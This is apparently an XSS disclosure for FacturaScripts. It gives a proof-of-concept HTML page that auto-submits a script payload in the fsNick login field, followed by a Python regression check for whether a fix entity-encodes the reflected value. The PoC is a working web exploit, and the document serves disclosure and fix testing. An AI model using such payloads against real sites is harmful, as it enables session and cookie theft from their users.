FacturaScripts is vulnerable to XSS in the fsNick parameter.
Save this code as poc.html:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/" method="POST">
<input type="hidden" name="fsNick" value="1'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;alert(document.cookie)&lt;/ScRiPt&gt;" />
<input type="hidden" name="fsPassword" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Open the file in your browser -> the XSS triggers.
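
A regression check for this issue, as an added example that is not part of the original report or of FacturaScripts: it classifies how the fsNick value from the PoC above is echoed in a response body, so a fix can be verified to entity-encode every markup character. The function names and the sample response bodies are constructed for illustration.

```python
import html
import re

# fsNick value submitted by the PoC form on this page.
FSNICK_PAYLOAD = "1'\"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>"

MARKUP_CHARS = "<>\"'"   # must never be echoed raw in HTML text or attributes
NAMED = {"<": "lt", ">": "gt", '"': "quot", "'": "apos", "&": "amp"}


def _char_pattern(ch):
    """Regex matching one character either encoded as an entity or raw."""
    alts = [f"&#0*{ord(ch)};", f"&#[xX]0*(?i:{ord(ch):x});"]
    if ch in NAMED:
        alts.append(f"&{NAMED[ch]};")
    alts.append(re.escape(ch))          # raw form is tried last
    return "(?:" + "|".join(alts) + ")"


def check_reflection(body, value=FSNICK_PAYLOAD):
    """Return (state, raw_chars) for how `value` is echoed in `body`.

    state is "absent", "encoded" (every markup character came back as an
    entity) or "unsafe" (at least one of < > " ' came back raw).
    """
    pattern = re.compile("".join(_char_pattern(c) for c in value))
    found, raw = False, set()
    for match in pattern.finditer(body):
        found = True
        raw.update(c for c in match.group(0) if c in MARKUP_CHARS)
    if not found:
        return ("absent", "")
    return ("unsafe", "".join(sorted(raw))) if raw else ("encoded", "")


def sample_bodies():
    """Constructed response bodies (not captured from FacturaScripts)."""
    p = FSNICK_PAYLOAD
    tags_only = p.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    return {
        "verbatim": f"<div class='msg'>Unknown user {p}</div>",
        "escaped": f"<div class='msg'>Unknown user {html.escape(p)}</div>",
        "tags_only": f'<input name="fsNick" value="{tags_only}">',
        "no_echo": "<div class='msg'>Login failed</div>",
    }


if __name__ == "__main__":
    for name, body in sample_bodies().items():
        print(name, check_reflection(body))
```

The "tags_only" case is the one a naive fix misses: angle brackets are encoded but the quotes come back raw, which still breaks out of a quoted attribute.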